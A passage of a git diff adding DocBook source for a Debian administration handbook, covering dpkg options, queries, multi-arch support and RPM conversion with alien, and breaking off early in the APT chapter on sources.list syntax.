+      will give a complete list of these options. The most frequent error,
+      which you are bound to encounter sooner or later, is a file
+      collision. When a package contains a file that is already installed
+      by another package, <command>dpkg</command> will refuse to install
+      it. The following messages will then appear:</para>
+
+      <screen>
+<computeroutput>Unpacking libgdm (from .../libgdm_3.8.3-2_amd64.deb) ...
+dpkg: error processing /var/cache/apt/archives/libgdm_3.8.3-2_amd64.deb (--unpack):
+ trying to overwrite '/usr/bin/gdmflexiserver', which is also in package gdm3 3.4.1-9</computeroutput>
+</screen>
+
+      <para>In this case, if you think that replacing this file is not a
+      significant risk to the stability of your system (which is usually
+      the case), you can use the option
+      <literal>--force-overwrite</literal>, which tells
+      <command>dpkg</command> to ignore this error and overwrite the
+      file.</para>
+
+      <para>While there are many available <literal>--force-*</literal>
+      options, only <literal>--force-overwrite</literal> is likely to be
+      used regularly. These options only exist for exceptional situations,
+      and it is better to leave them alone as much as possible in order to
+      respect the rules imposed by the packaging mechanism. Do not forget,
+      these rules ensure the consistency and stability of your
+      system.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Effective use of <literal>--force-*</literal></title>
+        <indexterm><primary>broken dependency</primary></indexterm>
+
+	<para>If you are not careful, the use of an option
+	<literal>--force-*</literal> can lead to a system where the APT
+	family of commands will refuse to function. In effect, some of
+	these options allow installation of a package when a dependency is
+	not met, or when there is a conflict. The result is an inconsistent
+	system from the point of view of dependencies, and the APT commands
+	will refuse to execute any action except those that will bring
+	the system back to a consistent state (this often consists of
+	installing the missing dependency or removing a problematic
+	package). This often results in a message like this one, obtained
+	after installing a new version of <emphasis role="pkg">rdesktop</emphasis> while ignoring its dependency on a
+	newer version of the <emphasis role="pkg">libc6</emphasis>:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>apt full-upgrade
+</userinput><computeroutput>[...]
+You might want to run 'apt-get -f install' to correct these.
+The following packages have unmet dependencies:
+  rdesktop: Depends: libc6 (&gt;= 2.5) but 2.3.6.ds1-13etch7 is installed
+E: Unmet dependencies. Try using -f.</computeroutput></screen>
+
+	<para>A courageous administrator who is certain of the correctness
+	of their analysis may choose to ignore a dependency or conflict and
+	use the corresponding <literal>--force-*</literal> option. In this
+	case, if they want to be able to continue to use
+	<command>apt</command> or <command>aptitude</command>, they
+	must edit <filename>/var/lib/dpkg/status</filename> to
+	delete/modify the dependency, or conflict, that they chose to
+	override.</para>
+
+	<para>This manipulation is an ugly hack, and should never be used,
+	except in the most extreme case of necessity. Quite frequently, a
+	more fitting solution is to recompile the package that's causing
+	the problem (see <xref linkend="sect.rebuilding-package" />) or use
+	a new version (potentially corrected) from a repository such as
+	the <literal>stable-backports</literal> one (see <xref linkend="sect.backports" />).</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Package Removal</title>
+      <indexterm><primary>removing a package</primary></indexterm>
+      <indexterm><primary>purging a package</primary></indexterm>
+      <indexterm><primary>package</primary><secondary>removal</secondary></indexterm>
+      <indexterm><primary>package</primary><secondary>purge</secondary></indexterm>
+
+      <para>Invoking <command>dpkg</command> with the <literal>-r</literal>
+      or <literal>--remove</literal> option, followed by the name of a
+      package, removes that package. This removal is, however, not
+      complete: all of the configuration files, maintainer scripts, log files
+      (system logs) and other user data handled by the package remain. That
+      way disabling the program is easily done by uninstalling it,
+      and it's still possible to quickly reinstall it with the same
+      configuration. To completely remove everything associated with a
+      package, use the <literal>-P</literal> or <literal>--purge</literal>
+      option, followed by the package name.</para>
+
+      <example>
+        <title>Removal and purge of the <emphasis role="pkg">debian-cd</emphasis> package</title>
+
+        <screen><computeroutput># </computeroutput><userinput>dpkg -r debian-cd</userinput>
+<computeroutput>(Reading database ... 112188 files and directories currently installed.)
+Removing debian-cd (3.1.20) ...
+# </computeroutput><userinput>dpkg -P debian-cd</userinput>
+<computeroutput>(Reading database ... 111613 files and directories currently installed.)
+Purging configuration files for debian-cd (3.1.20) ...
+</computeroutput>
+</screen>
+      </example>
+    </section>
+    <section>
+      <title>Querying <command>dpkg</command>'s Database and Inspecting <filename>.deb</filename> Files</title>
+      <indexterm><primary>package</primary><secondary>status</secondary></indexterm>
+      <indexterm><primary>package</primary><secondary>file list</secondary></indexterm>
+      <indexterm><primary>package</primary><secondary>content inspection</secondary></indexterm>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Option syntax</title>
+
+	<para>Most options are available in a “long” version (one or
+	more relevant words, preceded by a double dash) and a “short”
+	version (a single letter, often the initial of one word from the
+	long version, and preceded by a single dash). This convention is so
+	common that it is a POSIX standard.</para>
+      </sidebar>
+
+      <para>Before concluding this section, we will study
+      <command>dpkg</command> options that query the internal database in
+      order to obtain information. Giving first the long options and then
+      corresponding short options (that will evidently take the same
+      possible arguments) we cite <literal>--listfiles
+      <replaceable>package</replaceable></literal> (or
+      <literal>-L</literal>), which lists the files installed by this
+      package; <literal>--search <replaceable>file</replaceable></literal>
+      (or <literal>-S</literal>), which finds the package(s) containing the
+      file; <literal>--status
+      <replaceable>package</replaceable></literal> (or
+      <literal>-s</literal>), which displays the headers of an installed
+      package; <literal>--list</literal> (or <literal>-l</literal>), which
+      displays the list of packages known to the system and their
+      installation status; <literal>--contents
+      <replaceable>file.deb</replaceable></literal> (or
+      <literal>-c</literal>), which lists the files in the Debian package
+      specified; <literal>--info<replaceable> file.deb
+      </replaceable></literal> (or <literal>-I</literal>), which displays
+      the headers of this Debian package.</para>
+
+      <example>
+        <title>Various queries with <command>dpkg</command></title>
+
+        <screen role="scale" width="80">
+<computeroutput>$ </computeroutput><userinput>dpkg -L base-passwd</userinput>
+<computeroutput>/.
+/usr
+/usr/sbin
+/usr/sbin/update-passwd
+/usr/share
+/usr/share/base-passwd
+/usr/share/base-passwd/group.master
+/usr/share/base-passwd/passwd.master
+/usr/share/doc
+/usr/share/doc/base-passwd
+/usr/share/doc/base-passwd/README
+/usr/share/doc/base-passwd/changelog.gz
+/usr/share/doc/base-passwd/copyright
+/usr/share/doc/base-passwd/users-and-groups.html
+/usr/share/doc/base-passwd/users-and-groups.txt.gz
+/usr/share/doc-base
+/usr/share/doc-base/users-and-groups
+/usr/share/lintian
+/usr/share/lintian/overrides
+/usr/share/lintian/overrides/base-passwd
+/usr/share/man
+/usr/share/man/de
+/usr/share/man/de/man8
+/usr/share/man/de/man8/update-passwd.8.gz
+/usr/share/man/es
+/usr/share/man/es/man8
+/usr/share/man/es/man8/update-passwd.8.gz
+/usr/share/man/fr
+/usr/share/man/fr/man8
+/usr/share/man/fr/man8/update-passwd.8.gz
+/usr/share/man/ja
+/usr/share/man/ja/man8
+/usr/share/man/ja/man8/update-passwd.8.gz
+/usr/share/man/man8
+/usr/share/man/man8/update-passwd.8.gz
+/usr/share/man/pl
+/usr/share/man/pl/man8
+/usr/share/man/pl/man8/update-passwd.8.gz
+/usr/share/man/ru
+/usr/share/man/ru/man8
+/usr/share/man/ru/man8/update-passwd.8.gz
+$ </computeroutput><userinput>dpkg -S /bin/date</userinput>
+<computeroutput>coreutils: /bin/date
+$ </computeroutput><userinput>dpkg -s coreutils</userinput>
+<computeroutput>Package: coreutils
+Essential: yes
+Status: install ok installed
+Priority: required
+Section: utils
+Installed-Size: 15103
+Maintainer: Michael Stone &lt;mstone@debian.org&gt;
+Architecture: amd64
+Multi-Arch: foreign
+Version: 8.26-3
+Replaces: mktemp, realpath, timeout
+Pre-Depends: libacl1 (&gt;= 2.2.51-8), libattr1 (&gt;= 1:2.4.46-8), libc6 (&gt;= 2.17), libselinux1 (&gt;= 2.1.13)
+Conflicts: timeout
+Description: GNU core utilities
+ This package contains the basic file, shell and text manipulation
+ utilities which are expected to exist on every operating system.
+ .
+ Specifically, this package includes:
+ arch base64 basename cat chcon chgrp chmod chown chroot cksum comm cp
+ csplit cut date dd df dir dircolors dirname du echo env expand expr
+ factor false flock fmt fold groups head hostid id install join link ln
+ logname ls md5sum mkdir mkfifo mknod mktemp mv nice nl nohup nproc numfmt
+ od paste pathchk pinky pr printenv printf ptx pwd readlink realpath rm
+ rmdir runcon sha*sum seq shred sleep sort split stat stty sum sync tac
+ tail tee test timeout touch tr true truncate tsort tty uname unexpand
+ uniq unlink users vdir wc who whoami yes
+Homepage: http://gnu.org/software/coreutils
+$ </computeroutput><userinput>dpkg -l 'b*'</userinput>
+<computeroutput>Desired=Unknown/Install/Remove/Purge/Hold
+| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
+|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
+||/ Name                 Version         Architecture    Description
++++-====================-===============-===============-=============================================
+un  backupninja          &lt;none&gt;          &lt;none&gt;          (no description available)
+un  backuppc             &lt;none&gt;          &lt;none&gt;          (no description available)
+un  baekmuk-ttf          &lt;none&gt;          &lt;none&gt;          (no description available)
+un  base                 &lt;none&gt;          &lt;none&gt;          (no description available)
+un  base-config          &lt;none&gt;          &lt;none&gt;          (no description available)
+ii  base-files           9.9+deb9u1      amd64           Debian base system miscellaneous files
+ii  base-passwd          3.5.43          amd64           Debian base system master password and group 
+ii  bash                 4.4-5           amd64           GNU Bourne Again SHell
+[...]
+$ </computeroutput><userinput>dpkg -c /var/cache/apt/archives/gnupg_2.1.18-8~deb9u1_amd64.deb</userinput>
+<computeroutput>drwxr-xr-x root/root         0 2017-09-18 20:41 ./
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/bin/
+-rwxr-xr-x root/root    996648 2017-09-18 20:41 ./usr/bin/gpg
+-rwxr-xr-x root/root      3444 2017-09-18 20:41 ./usr/bin/gpg-zip
+-rwxr-xr-x root/root    161192 2017-09-18 20:41 ./usr/bin/gpgconf
+-rwxr-xr-x root/root     26696 2017-09-18 20:41 ./usr/bin/gpgparsemail
+-rwxr-xr-x root/root     76112 2017-09-18 20:41 ./usr/bin/gpgsplit
+-rwxr-xr-x root/root    158344 2017-09-18 20:41 ./usr/bin/kbxutil
+-rwxr-xr-x root/root      1081 2014-06-25 16:17 ./usr/bin/lspgpot
+-rwxr-xr-x root/root      2194 2017-09-18 20:41 ./usr/bin/migrate-pubring-from-classic-gpg
+-rwxr-xr-x root/root     14328 2017-09-18 20:41 ./usr/bin/watchgnupg
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/sbin/
+-rwxr-xr-x root/root      3078 2017-09-18 20:41 ./usr/sbin/addgnupghome
+-rwxr-xr-x root/root      2219 2017-09-18 20:41 ./usr/sbin/applygnupgdefaults
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/doc/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/doc/gnupg/
+-rw-r--r-- root/root     18964 2017-01-23 18:39 ./usr/share/doc/gnupg/DETAILS.gz
+[...]
+$ </computeroutput><userinput>dpkg -I /var/cache/apt/archives/gnupg_2.1.18-8~deb9u1_amd64.deb</userinput>
+<computeroutput> new debian package, version 2.0.
+ size 1124042 bytes: control archive=2221 bytes.
+    1388 bytes,    24 lines      control              
+    2764 bytes,    43 lines      md5sums              
+ Package: gnupg
+ Source: gnupg2
+ Version: 2.1.18-8~deb9u1
+ Architecture: amd64
+ Maintainer: Debian GnuPG Maintainers &lt;pkg-gnupg-maint@lists.alioth.debian.org&gt;
+ Installed-Size: 2088
+ Depends: gnupg-agent (= 2.1.18-8~deb9u1), libassuan0 (&gt;= 2.0.1), libbz2-1.0, libc6 (&gt;= 2.15), libgcrypt20 (&gt;= 1.7.0), libgpg-error0 (&gt;= 1.14), libksba8 (&gt;= 1.3.4), libreadline7 (&gt;= 6.0), libsqlite3-0 (&gt;= 3.7.15), zlib1g (&gt;= 1:1.1.4)
+ Recommends: dirmngr (= 2.1.18-8~deb9u1), gnupg-l10n (= 2.1.18-8~deb9u1)
+ Suggests: parcimonie, xloadimage
+ Breaks: debsig-verify (&lt;&lt; 0.15), dirmngr (&lt;&lt; 2.1.18-8~deb9u1), gnupg2 (&lt;&lt; 2.1.11-7+exp1), libgnupg-interface-perl (&lt;&lt; 0.52-3), libgnupg-perl (&lt;= 0.19-1), libmail-gnupg-perl (&lt;= 0.22-1), monkeysphere (&lt;&lt; 0.38~), php-crypt-gpg (&lt;= 1.4.1-1), python-apt (&lt;= 1.1.0~beta4), python-gnupg (&lt;&lt; 0.3.8-3), python3-apt (&lt;= 1.1.0~beta4)
+ Replaces: gnupg2 (&lt;&lt; 2.1.11-7+exp1)
+ Provides: gpg
+ Section: utils
+ Priority: optional
+ Multi-Arch: foreign
+ Homepage: https://www.gnupg.org/
+ Description: GNU privacy guard - a free PGP replacement
+  GnuPG is GNU's tool for secure communication and data storage.
+  It can be used to encrypt data and to create digital signatures.
+  It includes an advanced key management facility and is compliant
+  with the proposed OpenPGP Internet standard as described in RFC4880.
+[...]</computeroutput>
+</screen>
+      </example>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Comparison of versions</title>
+        <indexterm><primary>version, comparison</primary></indexterm>
+        <indexterm><primary>comparison of versions</primary></indexterm>
+
+	<para>Since <command>dpkg</command> is the program for handling
+	Debian packages, it also provides the reference implementation of
+	the logic of comparing version numbers. This is why it has a
+	<literal>--compare-versions</literal> option, usable by external
+	programs (especially configuration scripts executed by
+	<command>dpkg</command> itself). This option requires three
+	parameters: a version number, a comparison operator, and a second
+	version number. The different possible operators are
+	<literal>lt</literal> (strictly less than), <literal>le</literal>
+	(less than or equal to), <literal>eq</literal> (equal),
+	<literal>ne</literal> (not equal), <literal>ge</literal> (greater
+	than or equal to), and <literal>gt</literal> (strictly greater
+	than). If the comparison is correct, <command>dpkg</command> returns
+	0 (success); if not, it gives a non-zero return
+	value (indicating failure).</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>dpkg --compare-versions 1.2-3 gt 1.1-4</userinput>
+<computeroutput>$ </computeroutput><userinput>echo $?</userinput>
+<computeroutput>0
+$ </computeroutput><userinput>dpkg --compare-versions 1.2-3 lt 1.1-4</userinput>
+<computeroutput>$ </computeroutput><userinput>echo $?</userinput>
+<computeroutput>1
+$ </computeroutput><userinput>dpkg --compare-versions 2.6.0pre3-1 lt 2.6.0-1</userinput>
+<computeroutput>$ </computeroutput><userinput>echo $?</userinput>
+<computeroutput>1</computeroutput>
+</screen>
+
+	<para>Note the unexpected failure of the last comparison: for
+	<command>dpkg</command>, <literal>pre</literal>, usually denoting a
+	pre-release, has no particular meaning, and this program compares
+	the alphabetic characters in the same way as the numbers (a &lt; b
+	&lt; c ...), in alphabetical order. This is why it considers
+	“<literal>0pre3</literal>” to be greater than
+	“<literal>0</literal>”. When we want a package's version number
+	to indicate that it is a pre-release, we use the tilde character,
+	“<literal>~</literal>”:</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>dpkg --compare-versions 2.6.0~pre3-1 lt 2.6.0-1</userinput>
+<computeroutput>$ </computeroutput><userinput>echo $?</userinput>
+<computeroutput>0</computeroutput>
+</screen>
+      </sidebar>
+    </section>
+    <section>
+      <title><command>dpkg</command>'s Log File</title>
+
+      <para><command>dpkg</command> keeps a log of all of its actions in
+      <filename>/var/log/dpkg.log</filename>. This log is extremely
+      verbose, since it details every one of the stages through which
+      packages handled by <command>dpkg</command> go. In addition to
+      offering a way to track dpkg's behavior, it helps, above all, to keep
+      a history of the development of the system: one can find the exact
+      moment when each package has been installed or updated, and this
+      information can be extremely useful in understanding a recent change
+      in behavior. Additionally, all versions being recorded, it is easy to
+      cross-check the information with the
+      <filename>changelog.Debian.gz</filename> for packages in question, or
+      even with online bug reports.</para>
+    </section>
+    <section id="sect.multi-arch">
+      <title>Multi-Arch Support</title>
+      <indexterm><primary>Multi-Arch</primary></indexterm>
+      <indexterm><primary>architecture</primary><secondary>multi-arch support</secondary></indexterm>
+
+      <para>All Debian packages have an <literal>Architecture</literal>
+      field in their control information. This field can contain either
+      “<literal>all</literal>” (for packages that are architecture
+      independent) or the name of the architecture that it targets (like
+      “amd64”, “armhf”, …). In the latter case, by default,
+      <command>dpkg</command> will only accept to install the package if
+      its architecture matches the host's architecture as returned by
+      <command>dpkg --print-architecture</command>.</para>
+
+      <para>This restriction ensures that users do not end up with binaries
+      compiled for an incorrect architecture. Everything would be perfect
+      except that (some) computers can run binaries for multiple architectures,
+      either natively (an “amd64“ system can run “i386” binaries) or through
+      emulators.</para>
+      
+      <section>
+        <title>Enabling Multi-Arch</title>
+	<para><command>dpkg</command>'s multi-arch support allows
+	users to define “foreign architectures” that can be installed
+	on the current system. This is simply done with
+	<command>dpkg --add-architecture</command> like in the example
+	below. There is a corresponding <command>dpkg --remove-architecture</command>
+	to drop support of a foreign architecture, but it can only be used
+	when no packages of this architecture remain.</para>
+
+	<screen>
+<computeroutput># </computeroutput><userinput>dpkg --print-architecture</userinput>
+<computeroutput>amd64
+# </computeroutput><userinput>dpkg --print-foreign-architectures</userinput>
+<computeroutput># </computeroutput><userinput>dpkg -i gcc-6-base_6.3.0-18_armhf.deb</userinput>
+<computeroutput>dpkg: error processing archive gcc-6-base_6.3.0-18_armhf.deb (--install):
+ package architecture (armhf) does not match system (amd64)
+Errors were encountered while processing:
+ gcc-6-base_6.3.0-18_armhf.deb
+# </computeroutput><userinput>dpkg --add-architecture armhf</userinput>
+<computeroutput># </computeroutput><userinput>dpkg --add-architecture armel</userinput>
+<computeroutput># </computeroutput><userinput>dpkg --print-foreign-architectures</userinput>
+<computeroutput>armhf
+armel
+# </computeroutput><userinput>dpkg -i gcc-6-base_6.3.0-18_armhf.deb</userinput>
+<computeroutput>Selecting previously unselected package gcc-6-base:armhf.
+(Reading database ... 112000 files and directories currently installed.)
+Preparing to unpack gcc-6-base_6.3.0-18_armhf.deb ...
+Unpacking gcc-6-base:armhf (6.3.0-18) ...
+Setting up gcc-6-base:armhf (6.3.0-18) ...
+# </computeroutput><userinput>dpkg --remove-architecture armhf</userinput>
+<computeroutput>dpkg: error: cannot remove architecture 'armhf' currently in use by the database
+# </computeroutput><userinput>dpkg --remove-architecture armel</userinput>
+<computeroutput># </computeroutput><userinput>dpkg --print-foreign-architectures</userinput>
+<computeroutput>armhf</computeroutput>
+</screen>
+
+	<sidebar>
+	  <title><emphasis>NOTE</emphasis> APT's multi-arch support</title>
+	  <para>APT will automatically detect when dpkg has been configured
+	  to support foreign architectures and will start downloading the
+	  corresponding <filename>Packages</filename> files durings its
+	  update process.</para>
+	  <para>Foreign packages can then be installed with <command>apt
+	  install
+	  <replaceable>package</replaceable>:<replaceable>architecture</replaceable></command>.</para>
+	</sidebar>
+
+	<sidebar>
+	  <title><emphasis>IN PRACTICE</emphasis> Using proprietary i386 binaries on amd64</title>
+	  <para>There are multiple use cases for multi-arch, but the most
+	  popular one is the possibility to execute 32 bit binaries (i386)
+	  on 64 bit systems (amd64).</para>
+	</sidebar>
+      </section>
+      <section>
+	<title>Multi-Arch Related Changes</title>
+
+	<para>To make multi-arch actually useful and usable, libraries had to
+	be repackaged and moved to an architecture-specific directory so that
+	multiple copies (targeting different architectures) can be installed
+	alongside. Such updated packages contain the “<literal>Multi-Arch:
+	same</literal>” header field to tell the packaging system that the
+	various architectures of the package can be safely co-installed (and
+	that those packages can only satisfy dependencies of packages of the
+        same architecture). The most important libraries have been converted
+        since the introduction of multi-arch in Debian
+        <emphasis role="distribution">Wheezy</emphasis>, but there are many
+        libraries that will likely never be converted unless someone
+        specifically requests it (through a bug report for example).
+	</para>
+
+	<screen><computeroutput>$ </computeroutput><userinput>dpkg -s gcc-6-base
+</userinput><computeroutput>dpkg-query: error: --status needs a valid package name but 'gcc-6-base' is not: ambiguous package name 'gcc-6-base' with more than one installed instance
+
+Use --help for help about querying packages.
+$ </computeroutput><userinput>dpkg -s gcc-6-base:amd64 gcc-6-base:armhf | grep ^Multi
+</userinput><computeroutput>Multi-Arch: same
+Multi-Arch: same
+$ </computeroutput><userinput>dpkg -L libgcc1:amd64 |grep .so
+</userinput><computeroutput>/lib/x86_64-linux-gnu/libgcc_s.so.1
+$ </computeroutput><userinput>dpkg -S /usr/share/doc/gcc-6-base/copyright
+</userinput><computeroutput>gcc-6-base:amd64, gcc-6-base:armhf: /usr/share/doc/gcc-6-base/copyright
+</computeroutput></screen>
+
+	<para>It is worth noting that <literal>Multi-Arch: same</literal> packages
+	must have their names qualified with their architecture to be unambiguously
+	identifiable. They also have the possibility to share files with other
+	instances of the same package; <command>dpkg</command> ensures that all
+	packages have bit-for-bit identical files when they are shared. Last but
+	not least, all instances of a package must have the same version. They must
+	thus be upgraded together.
+	</para>
+
+	<para>Multi-Arch support also brings some interesting challenges in
+	the way dependencies are handled. Satisfying a dependency requires
+	either a package marked “<literal>Multi-Arch: foreign</literal>” or a
+	package whose architecture matches the one of the package declaring
+	the dependency (in this dependency resolution process,
+	architecture-independent packages are assumed to be of the same
+	architecture than the host). A dependency can also be weakened
+	to allow any architecture to fulfill it, with the
+	<literal><replaceable>package</replaceable>:any</literal> syntax, but
+	foreign packages can only satisfy such a dependency if they
+	are marked “<literal>Multi-Arch: allowed</literal>”.</para>
+      </section>
+    </section>
+  </section>
+  <section id="sect.coexistence-with-other-packaging-systems">
+    <title>Coexistence with Other Packaging Systems</title>
+    <indexterm><primary>RPM</primary></indexterm>
+    <indexterm><primary>Red Hat Package Manager</primary></indexterm>
+    <indexterm><primary><command>alien</command></primary></indexterm>
+
+    <para>Debian packages are not the only software packages used in the
+    free software world. The main competitor is the RPM format of the Red Hat
+    Linux distribution and its many derivatives. Red Hat is a very popular, commercial
+    distribution. It is thus common for software provided by third parties to be
+    offered as RPM packages rather than Debian.</para>
+
+    <para>In this case, you should know that the program
+    <command>rpm</command>, which handles RPM packages, is available as a
+    Debian package, so it is possible to use this package format on Debian.
+    Care should be taken, however, to limit these manipulations to extract
+    the information from a package or to verify its integrity. It is, in
+    truth, unreasonable to use <command>rpm</command> to install an RPM on
+    a Debian system; RPM uses its own database, separate from those of
+    native software (such as <command>dpkg</command>). This is why it is
+    not possible to ensure a stable coexistence of two packaging
+    systems.</para>
+
+    <para>On the other hand, the <emphasis role="pkg">alien</emphasis>
+    utility can convert RPM packages into Debian packages, and vice
+    versa.</para>
+
+    <sidebar>
+      <title><emphasis>COMMUNITY</emphasis> Encouraging the adoption of <filename>.deb</filename></title>
+
+      <para>If you regularly use the <command>alien</command> program to
+      install RPM packages coming from one of your providers, do not
+      hesitate to write to them and amicably express your strong preference
+      for the <filename>.deb</filename> format. Note that the format of the
+      package is not everything: a <filename>.deb</filename> package built
+      with <command>alien</command> or prepared for a version of Debian
+      different than that which you use, or even for a derivative distribution
+      like Ubuntu, would probably not offer the same level of quality and
+      integration as a package specifically developed for Debian <emphasis role="distribution">Stretch</emphasis>.</para>
+    </sidebar>
+
+    <screen>
+<computeroutput>$ </computeroutput><userinput>fakeroot alien --to-deb phpMyAdmin-4.7.5-2.fc28.noarch.rpm</userinput>
+<computeroutput>phpmyadmin_4.7.5-3_all.deb generated
+$ </computeroutput><userinput>ls -s phpmyadmin_4.7.5-3_all.deb</userinput>
+<computeroutput>  4356 phpmyadmin_4.7.5-3_all.deb</computeroutput>
+</screen>
+
+    <para>You will find that this process is extremely simple. You must
+    know, however, that the package generated does not have any dependency
+    information, since the dependencies in the two packaging formats
+    don't have systematic correspondence. The administrator must thus
+    manually ensure that the converted package will function correctly, and
+    this is why Debian packages thus generated should be avoided as much as
+    possible. Fortunately, Debian has the largest collection of software
+    packages of all distributions, and it is likely that whatever you seek
+    is already in there.</para>
+
+    <para>Looking at the man page for the <command>alien</command> command,
+    you will also note that this program handles other packaging
+    formats, especially the one used by the Slackware distribution (it is made of a
+    simple <filename>tar.gz</filename> archive).</para>
+
+    <para>The stability of the software deployed using the
+    <command>dpkg</command> tool contributes to Debian's fame. The APT
+    suite of tools, described in the following chapter, preserves this
+    advantage, while relieving the administrator from managing the status
+    of packages, a necessary but difficult task.</para>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/06_apt.xml b/tmp/cs-CZ/xml_tmp/06_apt.xml
new file mode 100644
index 000000000..637cc77da
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/06_apt.xml
@@ -0,0 +1,2364 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="apt">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-apt.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>apt</keyword>
+      <keyword>apt-get</keyword>
+      <keyword>apt-cache</keyword>
+      <keyword>aptitude</keyword>
+      <keyword>synaptic</keyword>
+      <keyword>sources.list</keyword>
+      <keyword>apt-cdrom</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Maintenance and Updates: The APT Tools</title>
+  <highlights>
+    <para>What makes Debian so popular with administrators is how easily
+    software can be installed and how easily the whole system can be
+    updated. This unique advantage is largely due to the
+    <emphasis>APT</emphasis> program, that Falcot Corp
+    administrators studied with enthusiasm.</para>
+  </highlights>
+
+  <para><indexterm><primary>APT</primary></indexterm>
+  <indexterm><primary>Advanced Package Tool</primary></indexterm> APT is
+  the abbreviation for Advanced Package Tool. What makes this program
+  “advanced” is its approach to packages. It doesn't simply evaluate
+  them individually, but it considers them as a whole and produces the best
+  possible combination of packages depending on what is available and
+  compatible (according to dependencies).</para>
+
+  <sidebar>
+    <title><emphasis>VOCABULARY</emphasis> Package source and source package</title>
+
+    <para>The word <emphasis>source</emphasis> can be ambiguous. A source
+    package — a package containing the source code of a program —
+    should not be confused with a package source — a repository (website,
+    FTP server, CD-ROM, local directory, etc.) which contains
+    packages.</para>
+  </sidebar>
+
+  <para>APT needs to be given a “list of package sources”: the file
+  <filename>/etc/apt/sources.list</filename> will list the different
+  repositories (or “sources”) that publish Debian packages. APT will
+  then import the list of packages published by each of these
+  sources. This operation is achieved by downloading
+  <filename>Packages.xz</filename> or a variant using a different
+  compression method (such as <filename>Packages.gz</filename> or
+  <filename>.bz2</filename>) files (in
+  case of a source of binary packages) and
+  <filename>Sources.xz</filename> or a variant (in case of a source of
+  source packages) and by analyzing their contents. When an old copy
+  of these files is already present, APT can update it by only
+  downloading the differences (see sidebar <xref linkend="sidebar.apt-pdiff" />).</para>
+  <indexterm><primary><filename>Packages.xz</filename></primary></indexterm>
+  <indexterm><primary><filename>Sources.xz</filename></primary></indexterm>
+
+  <sidebar>
+    <title><emphasis>BACK TO BASICS</emphasis> <command>gzip</command>, <command>bzip2</command>, <command>LZMA</command> and <command>XZ</command> Compression</title>
+    <indexterm><primary><command>gzip</command></primary></indexterm>
+    <indexterm><primary><command>bzip2</command></primary></indexterm>
+    <indexterm><primary><command>lzma</command></primary></indexterm>
+    <indexterm><primary><command>xz</command></primary></indexterm>
+
+    <para>A <filename>.gz</filename> extension refers to a file
+    compressed with the <command>gzip</command>
+    utility. <command>gzip</command> is the fast and efficient
+    traditional Unix utility to compress files.  Newer tools achieve
+    better rates of compression but require more resources
+    (computation time and memory) to compress and uncompress a
+    file. Among them, and by order of appearance, there are
+    <command>bzip2</command> (generating files with a
+    <filename>.bz2</filename> extension), <command>lzma</command>
+    (generating <filename>.lzma</filename> files) and
+    <command>xz</command> (generating <filename>.xz</filename>
+    files).</para>
+  </sidebar>
+  <section id="sect.apt-sources.list">
+    <title>Filling in the <filename>sources.list</filename> File</title>
+    <indexterm><primary><filename>sources.list</filename></primary></indexterm>
+    <indexterm><primary>source</primary><secondary>of packages</secondary></indexterm>
+    <indexterm><primary>package</primary><secondary>source of</secondary></indexterm>
+    <indexterm><primary><filename>/etc/apt/sources.list</filename></primary></indexterm>
+
+    <section>
+      <title>Syntax</title>
+
+      <para>Each active line of the
+      <filename>/etc/apt/sources.list</filename> file contains the
+      description of a source, made of 3 parts separated by spaces.</para>
+
+      <para>The first field indicates the source type:</para>
+      <itemizedlist>
+	<listitem>
+	  <para>“<literal>deb</literal>” for binary packages,</para>
+	</listitem>
+	<listitem>
+	  <para>“<literal>deb-src</literal>” for source packages.</para>
+	</listitem>
+      </itemizedlist>
+
+      <para>The second field gives the base URL of the source (combined with
+      the filenames present in the <filename>Packages.xz</filename> files, it
+      must give a full and valid URL): this can consist in a Debian mirror or
+      in any other package archive set up by a third party. The URL can start
+      with <literal>file://</literal> to indicate a local source installed in
+      the system's file hierarchy, with <literal>http://</literal> to
+      indicate a source accessible from a web server, or with
+      <literal>ftp://</literal> for a source available on an FTP server. The
+      URL can also start with <literal>cdrom:</literal> for CD-ROM/DVD-ROM/Blu-ray 
+      disc based installations, although this is less frequent, since
+      network-based installation methods are more and more common.</para>
+
+      <para>The syntax of the last field depends on the structure of the
+      repository. In the simplest cases, you can simply indicate a
+      subdirectory (with a required trailing slash) of the desired source
+      (this is often a simple “<filename>./</filename>” which refers to the
+      absence of a subdirectory — the packages are then directly at the
+      specified URL). But in the most common case, the repositories will be
+      structured like a Debian mirror, with multiple distributions each
+      having multiple components. In those cases, name the chosen
+      distribution (by its “codename” — see the list in sidebar <xref linkend="sidebar.bruce-perens" /> — or by the corresponding “suites” —
+      <literal>stable</literal>, <literal>testing</literal>,
+      <literal>unstable</literal>), then the components (or sections) to
+      enable (chosen between <literal>main</literal>,
+      <literal>contrib</literal>, and <literal>non-free</literal> in a
+      typical Debian mirror).</para>
+
+      <sidebar id="sidebar.sections">
+	<title><emphasis>VOCABULARY</emphasis> The <literal>main</literal>, <literal>contrib</literal> and <literal>non-free</literal> archives</title>
+	<indexterm><primary>section</primary><secondary><literal>main</literal></secondary></indexterm>
